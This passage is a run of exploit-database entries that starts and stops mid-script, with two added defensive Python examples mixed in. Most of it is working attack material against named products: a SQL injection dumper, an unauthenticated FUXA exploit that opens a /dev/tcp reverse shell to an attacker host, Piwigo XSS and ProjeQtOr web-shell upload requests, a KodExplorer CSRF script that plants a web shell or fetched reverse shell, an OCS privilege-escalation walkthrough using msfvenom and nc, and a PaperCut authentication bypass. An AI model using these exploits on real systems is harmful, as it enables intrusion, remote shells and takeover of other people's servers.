        r = re.findall(MARKER_RE, u.text)
        r = r[0].replace('\"', "").split(',')
        if r == []:
            pass
        else:
            for i in r:
                x.add_row([i])
    except:
        pass
    print(x)


def Main():
    Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
    Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
    Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
    Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
    Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
    Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
    Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
    (options, args) = Menu.parse_args()
    Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
""")
    Menu.add_option_group(Examples)
    if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
        Menu.print_help()
        print('')
        print(' %s' % __description__)
        print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
        print(' Any malicious or illegal activity may be punishable by law')
        print(' Use at your own risk')
    elif len(args) == 0:
        try:
            if options.url != None:
                if options.l_databases != None:
                    ListDatabases(options.url)
                if options.database != None:
                    if options.l_tables != None:
                        ListTables(options.url, options.database)
                    if options.table != None:
                        if options.dump != None:
                            DumpTable(options.url, options.database, options.table)
        except:
            print("Unexpected error")


if __name__ == '__main__':
    try:
        Main()
    except KeyboardInterrupt:
        print()
        print(infos.PROCESS + "Exiting...")
        print()
        exit(1)
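Every payload in the script above starts with `id=-2164'`: the single quote closes the string literal the application built around the id parameter, and the rest of the value is parsed as SQL. The following Python is an added example, not Chitor-CMS code: it models the vulnerable pattern against an in-memory SQLite database, then shows the same lookup with a bound parameter, and finally with the id validated as an integer before it is used. The school and login tables, their columns and the data in them are constructed for the example (the real schema is not on the page); the injected string is the classic UNION form and is kept deliberately minimal.

```python
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the CMS database (schema is an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE school (id INTEGER PRIMARY KEY, name TEXT, city TEXT)")
    conn.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO school VALUES (?, ?, ?)",
                     [(1, "North High", "Springfield"), (2, "East Prep", "Shelbyville")])
    conn.execute("INSERT INTO login VALUES (?, ?, ?)",
                 (1, "admin", "$2y$10$constructed-hash-value"))
    conn.commit()
    return conn


def edit_school_vulnerable(conn, school_id):
    """Model of the pre-patch pattern: the id is pasted into the SQL text, so a quote
    inside it ends the literal and whatever follows is executed as SQL."""
    query = "SELECT id, name, city FROM school WHERE id='%s'" % school_id
    return conn.execute(query).fetchall()


def edit_school_safe(conn, school_id):
    """Bound parameter: the value travels separately from the SQL text and can never
    change the statement's structure, whatever characters it contains."""
    return conn.execute("SELECT id, name, city FROM school WHERE id=?", (school_id,)).fetchall()


def edit_school_strict(conn, school_id):
    """Defence in depth: an id must be an integer, so reject anything else up front
    and still bind the value."""
    try:
        ident = int(school_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT id, name, city FROM school WHERE id=?", (ident,)).fetchall()
```

With the injected id the vulnerable version returns rows from the login table because the UNION ran; the bound version returns nothing because SQLite compares the INTEGER column with the whole injected string as text; the strict version refuses the value before any query is built.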
-
Linux Kernel 6.2 - Userspace Processes To Enable Mitigation
## Exploit Title: Linux Kernel 6.2 - Userspace Processes To Enable Mitigation
## Exploit Author: nu11secur1ty
## CVE ID: CVE-2023-1998

## Description

## Summary

The Linux kernel allows userspace processes to enable mitigations by calling prctl with [PR_SET_SPECULATION_CTRL](https://docs.kernel.org/userspace-api/spec_ctrl.html), which disables the speculation feature, as well as by using seccomp. We had noticed that on VMs of at least one major cloud provider, the kernel still left the victim process exposed to attacks in some cases even after enabling the spectre-BTI mitigation with prctl. The same behaviour can be observed on a bare-metal machine when forcing the mitigation to IBRS on the boot command line.

This happened because when plain IBRS was enabled (not enhanced IBRS), the kernel had some logic that determined that [STIBP](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/single-thread-indirect-branch-predictors.html) was not needed. The IBRS bit implicitly protects against cross-thread branch target injection. However, with legacy [IBRS](https://www.intel.com/content/www/us/en/developer/articles/technical/software-security-guidance/technical-documentation/indirect-branch-restricted-speculation.html), the IBRS bit was cleared on returning to userspace, for performance reasons, which disabled the implicit STIBP and left userspace threads vulnerable to cross-thread branch target injection, against which STIBP protects.

## Severity

Medium - The kernel failed to protect applications that attempted to protect against Spectre v2, leaving them open to attack from other processes running on the same physical core in another hyperthread.

## Vulnerable code

The bug present in kernel 6.2 (https://elixir.bootlin.com/linux/v6.2/source/arch/x86/kernel/cpu/bugs.c#L1196) implements an optimization that disables STIBP if the mitigation is IBRS or eIBRS.
However, IBRS doesn't mitigate SMT attacks on userspace as eIBRS does. Setting spectre_v2=ibrs on the kernel boot parameters for bare metal machines without eIBRS support also triggers the bug.

```c
	/*
	 * If no STIBP, IBRS or enhanced IBRS is enabled, or SMT impossible,
	 * STIBP is not required.
	 */
	if (!boot_cpu_has(X86_FEATURE_STIBP) ||
	    !smt_possible ||
	    spectre_v2_in_ibrs_mode(spectre_v2_enabled))
		return;
```

## Proof of Concept

The test consists of two processes. The attacker constantly poisons an indirect call to speculatively redirect it to a target address. The victim process measures the mispredict rate and tries to mitigate the attack either by calling PRCTL or writing to the MSR directly using a kernel module that exposes MSR read and write operations to userspace.

```c
/*
gcc -o victim test.c -O0 -masm=intel -w -DVICTIM
gcc -o victim-PRCTL test.c -O0 -masm=intel -w -DVICTIM -DPRCTL
gcc -o victim-nospecctrl test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0
gcc -o victim-IBRS test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=1
gcc -o victim-STIBP test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=2
gcc -o victim-IBPB test.c -O0 -masm=intel -w -DVICTIM -DMSR -DMSR_VAL=0 -DIBPB
gcc -o attacker test.c -O0 -masm=intel -w
*/
/* utils.h is the author's helper header (jitForLoop, callGadget, flush, probe,
 * requestMem, copyLeakGadget, copyRetGadget, SetCoreAffinity, rdmsr_on_cpu,
 * wrmsr_on_cpu, THRESHOLD); it is not included in this write-up. */
#include "utils.h"
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/prctl.h>

#ifndef PRINT_AMMOUNT
#define PRINT_AMMOUNT 1000
#endif

#define IA32_SPEC_CTRL 72

uint8_t *rdiPtr;
uint8_t unused[0x500];
uint8_t probeArray[0x1000] = {2};
uint8_t unuse2[0x500];

uint32_t f1() {}

int poison(uint8_t *srcAddress, uint8_t *dstAddress, uint64_t cpu) {
  volatile uint8_t d;
  unsigned tries = 0;
  unsigned hits = 0;
  unsigned totalHits = 0;
  unsigned totalTries = 0;

  jitForLoop(srcAddress);

  while (1) {
#ifndef VICTIM
    /* attacker: keep training the indirect call towards dstAddress */
    callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
    continue;
#else
#ifdef IBPB
    wrmsr_on_cpu(73, cpu, 1);
#endif
    for (int i = 0; i < 100; i++) {
      d = *dstAddress;
      flush((uint8_t *)&rdiPtr);
      callGadget(srcAddress, (uint8_t *)&rdiPtr, (uint8_t *)probeArray);
    }
    /* a cached probe line means the call was speculatively redirected */
    if (probe(&probeArray[0]) < THRESHOLD) {
      hits++;
      totalHits++;
    }
    totalTries++;
    if (++tries % PRINT_AMMOUNT == 0) {
      printf("Rate: %u/%u MSR[72]=%d\n", hits, tries, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu));
#ifdef MSR
      wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
#endif
      tries = 0;
      hits = 0;
      if (totalTries >= PRINT_AMMOUNT * 10) {
        break;
      }
    }
    usleep(1);
#endif
  }
  printf("Total mispredict rate: %d/%d (%.2f %%)\n", totalHits, totalTries,
         (float)totalHits * 100 / (float)totalTries);
}

int main(int argc, char **argv) {
  uint64_t srcAddress;
  uint64_t dstAddress;
  uint64_t cpu;

  if (argc < 4) {
    printf("Usage: %s <srcAddress> <dstAddress> <cpuCore> \n", argv[0]);
    printf("Example: %s 0x55555554123 0x55555555345 1 \n", argv[0]);
    return 0;
  }

  srcAddress = (uint64_t)strtoull(argv[1], NULL, 16);
  dstAddress = (uint64_t)strtoull(argv[2], NULL, 16);
  cpu = (uint64_t)strtoull(argv[3], NULL, 16);
  SetCoreAffinity(cpu);

  uint8_t *rwx1 = requestMem((uint8_t *)(srcAddress & (~0xfffULL)), 0x1000);
  uint8_t *rwx2 = requestMem((uint8_t *)(dstAddress & (~0xfffULL)), 0x1000);

#ifdef PRCTL
  if (prctl(PR_SET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, PR_SPEC_FORCE_DISABLE, 0, 0) != 0) {
    perror("prctl");
  }
  printf("PRCTL GET value 0x%x\n", prctl(PR_GET_SPECULATION_CTRL, PR_SPEC_INDIRECT_BRANCH, 0, 0, 0));
#endif

#ifdef MSR
  printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
  wrmsr_on_cpu(IA32_SPEC_CTRL, cpu, MSR_VAL);
  printf("writing msr[%d]=%d on core %d \n", IA32_SPEC_CTRL, MSR_VAL, cpu);
  printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif

  // set up leak gadget into position
#ifdef VICTIM
  rdiPtr = (uint8_t *)f1;
  copyLeakGadget(dstAddress);
#else
  rdiPtr = (uint8_t *)dstAddress;
  copyRetGadget(dstAddress);
#endif

  poison(srcAddress, dstAddress, cpu);

#ifdef MSR
  printf("current value msr[%d]=%d on core %d\n", IA32_SPEC_CTRL, rdmsr_on_cpu(IA32_SPEC_CTRL, cpu), cpu);
#endif
}
```

## Timeline
**Date reported** to Cloud providers: 31/12/2022
**Date reported** to [email protected]: 20/02/2022
**Date fixed:** 10/03/2023 - [torvalds/linux@6921ed9](https://github.com/torvalds/linux/commit/6921ed9049bc7457f66c1596c5b78aec0dae4a9d) - https://kernel.dance/#6921ed9049bc7457f66c1596c5b78aec0dae4a9d
Date disclosed: 12/04/2023

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
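The practical question for an operator is whether a process that opts in through prctl or seccomp actually gets cross-thread protection on a given host, which, following the reasoning above, depends on whether the kernel is in enhanced IBRS mode (IBRS stays set in user mode, STIBP implicit) or legacy IBRS mode (IBRS is cleared on return to user mode, so STIBP must be on offer). The following Python is an added example and not part of the write-up or of the kernel: it parses the one-line status the kernel exposes under /sys/devices/system/cpu/vulnerabilities/spectre_v2 and classifies the host. The sample strings are constructed and modelled on the kernel's comma-separated reporting format; the exact token wording is an assumption, so compare against what your own kernel prints.

```python
# Real sysfs path where the kernel reports its Spectre v2 state (Linux only).
SYSFS_SPECTRE_V2 = "/sys/devices/system/cpu/vulnerabilities/spectre_v2"

# Constructed sample strings, modelled on the format written to that file.
# Token wording is an assumption of this example.
SAMPLES = {
    "eibrs":         "Mitigation: Enhanced IBRS, IBPB: conditional, RSB filling",
    "ibrs_no_stibp": "Mitigation: IBRS, IBPB: conditional, RSB filling",
    "ibrs_stibp":    "Mitigation: IBRS, IBPB: conditional, STIBP: conditional, RSB filling",
    "retpoline":     "Mitigation: Retpolines, IBPB: conditional, STIBP: conditional, RSB filling",
    "vulnerable":    "Vulnerable",
    "not_affected":  "Not affected",
}

# STIBP states under which an opted-in thread is covered: applied on request
# (conditional) or unconditionally (forced / always-on).
STIBP_ACTIVE = {"conditional", "forced", "always-on"}


def parse_spectre_v2(status):
    """Split the one-line status into a dict: 'state', 'mode', then one key per field.
    Fields without a value (e.g. 'RSB filling') are recorded as 'present'."""
    status = status.strip()
    if not status.startswith("Mitigation:"):
        return {"state": status}
    fields = [f.strip() for f in status[len("Mitigation:"):].split(",")]
    info = {"state": "Mitigation", "mode": fields[0]}
    for field in fields[1:]:
        key, _, value = field.partition(":")
        info[key.strip()] = value.strip() or "present"
    return info


def user_optin_protected(status):
    """Judge whether prctl(PR_SET_SPECULATION_CTRL) / seccomp opt-in really protects a
    user thread from cross-thread branch target injection on this host."""
    info = parse_spectre_v2(status)
    if info["state"] == "Not affected":
        return "not affected"
    if info["state"] != "Mitigation":
        return "unmitigated: " + info["state"]
    mode = info["mode"]
    if "Enhanced" in mode or "Automatic" in mode:
        # eIBRS leaves IBRS set across the return to user mode, so STIBP is implicit.
        return "protected: enhanced IBRS stays set in user mode, STIBP implicit"
    stibp = info.get("STIBP")
    if stibp in STIBP_ACTIVE:
        return "protected: STIBP " + stibp
    if mode == "IBRS":
        # The CVE-2023-1998 condition: legacy IBRS, cleared on return to user mode,
        # and no STIBP for the thread that asked for it.
        return "exposed: legacy IBRS without STIBP (CVE-2023-1998 pattern), opt-in does not protect user threads"
    return "exposed: STIBP unavailable (" + str(stibp) + ")"


def check_live(path=SYSFS_SPECTRE_V2):
    """Evaluate the running kernel; returns None where the sysfs file does not exist."""
    try:
        with open(path) as fh:
            return user_optin_protected(fh.read())
    except OSError:
        return None
```

check_live() is what a fleet inventory job would call; the classification is deliberately conservative and reports "exposed" whenever the STIBP field is missing in legacy IBRS mode, which is what the unfixed 6.2 kernel leaves you with.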
-
FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)
```python
# Exploit Title: FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)
# Date: 18/04/2023
# Exploit Author: Rodolfo Mariano
# Vendor Homepage: https://github.com/frangoteam/FUXA
# Version: FUXA V.1.1.13-1186 (current)

from argparse import RawTextHelpFormatter
import argparse, sys, threading, requests


def main(rhost, rport, lhost, lport):
    # str() so the integer default for --rport can be concatenated
    url = "http://" + rhost + ":" + str(rport) + "/api/runscript"
    # The "code" field is handed to the server-side script runner as-is
    payload = {
        "headers": {
            "normalizedNames": {},
            "lazyUpdate": "null"
        },
        "params": {
            "script": {
                "parameters": [
                    {
                        "name": "ok",
                        "type": "tagid",
                        "value": ""
                    }
                ],
                "mode": "",
                "id": "",
                "test": "true",
                "name": "ok",
                "outputId": "",
                "code": "require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost, lport)
            }
        }
    }
    response = requests.post(url, json=payload)


args = None
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter,
                                 usage="python exploit.py --rhost <ip> --rport <rport> --lhost <ip> --lport <port>")
parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost')
parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881)
parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost')
parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport')
args = parser.parse_args()
main(args.rhost, args.rport, args.lhost, args.lport)
```
-
Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)
Exploit Title: Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)
Application: Piwigo
Version: 13.6.0
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://piwigo.org/
Software Link: https://piwigo.org/get-piwigo
Date found: 18.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

Steps:
1. After uploading an image, enter <img%20src=x%20onerror=alert(4)> instead of a tag (keyword) while editing the image.

Payload: <img%20src=x%20onerror=alert(4)>

```http
POST /piwigo/admin.php?page=photo-9 HTTP/1.1
Host: localhost
Content-Length: 159
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/piwigo/admin.php?page=photo-9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: pwg_id=u7tjlue5o3vj7fbgb0ikodmb9m; phavsz=1394x860x1; pwg_display_thumbnail=display_thumbnail_classic; pwg_tags_per_page=100; phpbb3_ay432_k=; phpbb3_ay432_u=2; phpbb3_ay432_sid=9240ca5fb9f93c8ebc8ff7bd42c380fe
Connection: close

name=Untitled&author=&date_creation=&associate%5B%5D=1&tags%5B%5D=<img%20src=x%20onerror=alert(3)>&description=&level=0&pwg_token=bad904d2c7ec866bfba391bfc130ddd2&submit=Save+settings
```
-
OCS Inventory NG 2.3.0.0 - Unquoted Service Path
#####################################################################
#                                                                   #
# Exploit Title: OCS Inventory NG 2.3.0.0 - Unquoted Service Path   #
# Date: 2023/04/21                                                  #
# Exploit Author: msd0pe                                            #
# Vendor Homepage: https://oscinventory-ng.org                      #
# Software Link: https://github.com/OCSInventory-NG/WindowsAgent    #
# My Github: https://github.com/msd0pe-1                            #
# Fixed in version 2.3.1.0                                          #
#                                                                   #
#####################################################################

OCS Inventory NG Windows Agent: versions below 2.3.1.0 contain an unquoted service path which allows attackers to escalate privileges to the SYSTEM level.

[1] Find the unquoted service path:

```
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
OCS Inventory Service    OCS Inventory Service    C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe    Auto
```

[2] Get information about the service:

```
> sc qc "OCS Inventory Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OCS Inventory Service
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\OCS Inventory Agent\OcsService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OCS Inventory Service
        DEPENDENCIES       : RpcSs
                           : EventLog
                           : Winmgmt
                           : Tcpip
        SERVICE_START_NAME : LocalSystem
```

[3] Generate a reverse shell:

```
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o OCS.exe
```

[4] Upload the reverse shell to C:\Program Files (x86)\OCS.exe

```
> put OCS.exe
> ls
drw-rw-rw-          0  Sat Apr 22 05:20:38 2023 .
drw-rw-rw-          0  Sat Apr 22 05:20:38 2023 ..
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Common Files
-rw-rw-rw-        174  Sun Jul 24 08:12:38 2022 desktop.ini
drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Internet Explorer
drw-rw-rw-          0  Sun Jul 24 07:27:06 2022 Microsoft
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Microsoft.NET
drw-rw-rw-          0  Sat Apr 22 04:51:20 2023 OCS Inventory Agent
-rw-rw-rw-       7168  Sat Apr 22 05:20:38 2023 OCS.exe
drw-rw-rw-          0  Sat Apr 22 03:24:58 2023 Windows Defender
drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Windows Mail
drw-rw-rw-          0  Thu Jul 28 13:00:04 2022 Windows Media Player
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Multimedia Platform
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows NT
drw-rw-rw-          0  Fri Oct 28 05:25:41 2022 Windows Photo Viewer
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Portable Devices
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 Windows Sidebar
drw-rw-rw-          0  Sun Jul 24 08:18:13 2022 WindowsPowerShell
```

[5] Start listener

```
> nc -lvp 4444
```

[6] Restart the service/server

```
> sc stop "OCS Inventory Service"
> sc start "OCS Inventory Service"
```

OR

```
> shutdown /r
```

[7] Enjoy!

```
192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
```
-
ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)
Exploit Title: ProjeQtOr Project Management System 10.3.2 - Remote Code Execution (RCE)
Application: ProjeQtOr Project Management System
Version: 10.3.2
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://www.projeqtor.org
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download
Date found: 19.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

It is possible to upload a PHP file with a .phar extension in place of an image attachment. RCE is triggered when the uploaded file is visited afterwards.

Payload: <?php echo system("id"); ?>

PoC request:

```http
POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1
Host: localhost
Content-Length: 1177
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: application/json
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Linux"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/projeqtor/view/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic
Connection: close

------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"
Content-Type: application/octet-stream

<?php echo system("id"); ?>
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentId"


------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefType"

User
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentRefId"

1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentType"

file
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10485760
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentLink"


------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentDescription"


------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="attachmentPrivacy"

1
------WebKitFormBoundaryY0bpJaQzcvQberWR
Content-Disposition: form-data; name="uploadType"

html5
------WebKitFormBoundaryY0bpJaQzcvQberWR--
```

Visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar
-
KodExplorer 4.49 - CSRF to Arbitrary File Upload
```python
# Exploit Title: KodExplorer <= 4.49 - CSRF to Arbitrary File Upload
# Date: 21/04/2023
# Exploit Author: MrEmpy
# Software Link: https://github.com/kalcaddle/KodExplorer
# Version: <= 4.49
# Tested on: Linux
# CVE ID: CVE-2022-4944
# References:
# * https://vuldb.com/?id.227000
# * https://www.cve.org/CVERecord?id=CVE-2022-4944
# * https://github.com/MrEmpy/CVE-2022-4944

import argparse
import http.server
import socketserver
import os
import threading
import requests
from time import sleep


def banner():
    # Raw string so the backslashes of the ASCII-art logo are printed literally
    print(r'''
_ _____________ _____ _ ______ _____ _____ | | / / _ | _ \ ___| | | | ___ \/ __ \| ___| | |/ /| | | | | | | |____ ___ __ | | ___ _ __ ___ _ __ | |_/ /| / \/| |__ | \| | | | | | | __\ \/ / '_ \| |/ _ \| '__/ _ \ '__| | / | | | __| | |\ \ \_/ / |/ /| |___> <| |_) | | (_) | | | __/ | | |\ \ | \__/\| |___ \_| \_/\___/|___/ \____/_/\_\ .__/|_|\___/|_| \___|_| \_| \_| \____/\____/ | | |_|

[KODExplorer <= v4.49 Remote Code Execution]
[Coded by MrEmpy]
''')


def httpd():
    # Serve the ./http directory (next to this script) so the target can fetch shell.php
    port = 8080
    httpddir = os.path.join(os.path.dirname(__file__), 'http')
    os.chdir(httpddir)
    Handler = http.server.SimpleHTTPRequestHandler
    httpd = socketserver.TCPServer(('', port), Handler)
    print('[+] HTTP Server started')
    httpd.serve_forever()


def webshell(url, lhost):
    payload = '<pre><?php system($_GET["cmd"])?></pre>'
    path = '/data/User/admin/home/'
    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    wshell_f = open('http/shell.php', 'w')
    wshell_f.write(payload)
    wshell_f.close()
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://{lhost}:8080/shell.php&uuid=&time=')
    print(f'[+] After the victim opens the URI, his shell will be hosted at {url}/data/User/admin/home/shell.php?cmd=whoami')


def reverseshell(url, lhost):
    rvpayload = 'https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php'
    path = '/data/User/admin/home/'
    targetpath = input('[*] Target KODExplorer path (ex /var/www/html): ')
    lport = input('[*] Your local port: ')
    reqpayload = requests.get(rvpayload).text
    reqpayload = reqpayload.replace('127.0.0.1', lhost)
    reqpayload = reqpayload.replace('1234', lport)
    wshell_f = open('http/shell.php', 'w')
    wshell_f.write(reqpayload)
    wshell_f.close()
    print('[*] Opening HTTPd port')
    th = threading.Thread(target=httpd)
    th.start()
    print(f'[+] Send this URI to your target: {url}/index.php?explorer/serverDownload&type=download&savePath={targetpath}/data/User/admin/home/&url=http://{lhost}:8080/shell.php&uuid=&time=')
    input(f'[*] Run the command "nc -lnvp {lport}" to receive the connection and press any key\n')
    while True:
        # Poll until the uploaded file is reachable on the target
        hitshell = requests.get(f'{url}/data/User/admin/home/shell.php')
        sleep(1)
        if not hitshell.status_code == 200:
            continue
        else:
            print('[+] Shell sent and executed!')
            break


def main(url, lhost, mode):
    banner()
    if mode == 'webshell':
        webshell(url, lhost)
    elif mode == 'reverse':
        reverseshell(url, lhost)
    else:
        print('[-] There is no such mode. Use webshell or reverse')


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', action='store', help='target url', dest='url', required=True)
    parser.add_argument('-lh', '--local-host', action='store', help='local host', dest='lhost', required=True)
    parser.add_argument('-m', '--mode', action='store', help='mode (webshell, reverse)', dest='mode', required=True)
    arguments = parser.parse_args()
    main(arguments.url, arguments.lhost, arguments.mode)
```
-
PaperCut NG/MG 22.0.4 - Authentication Bypass
```python
# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass
# Date: 21 April 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350

import requests
from bs4 import BeautifulSoup
import re


def vuln_version():
    ip = input("Enter the ip address: ")
    url = "http://" + ip + ":9191" + "/app?service=page/SetupCompleted"
    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')
    text_div = soup.find('div', class_='text')
    product_span = text_div.find('span', class_='product')

    # Search for the first span element containing a version number
    version_span = None
    for span in text_div.find_all('span'):
        version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
        if version_match:
            version_span = span
            break

    if version_span is None:
        print('Not Vulnerable')
    else:
        version_str = version_span.text.strip()
        print('Version:', version_str)
        print("Vulnerable version")
        print(f"Step 1 visit this url first in your browser: {url}")
        print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")


if __name__ == "__main__":
    vuln_version()
```
-
Mars Stealer 8.3 - Admin Account Takeover
```python
# Exploit Title: Mars Stealer 8.3 - Admin Account Takeover
# Product: Mars Stealer
# Technology: PHP
# Version: < 8.3
# Google Dork: N/A
# Date: 20.04.2023
# Tested on: Linux
# Author: Sköll - twitter.com/s_k_o_l_l

import argparse
import requests

parser = argparse.ArgumentParser(description='Mars Stealer Account Takeover Exploit')
parser.add_argument('-u', '--url', required=True, help='Example: python3 exploit.py -u http://localhost/')
args = parser.parse_args()

url = args.url.rstrip('/') + '/includes/settingsactions.php'
headers = {
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "X-Requested-With": "XMLHttpRequest",
    "User-Agent": "Sköll",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Origin": url,
    "Referer": url,
    "Accept-Encoding": "gzip, deflate",
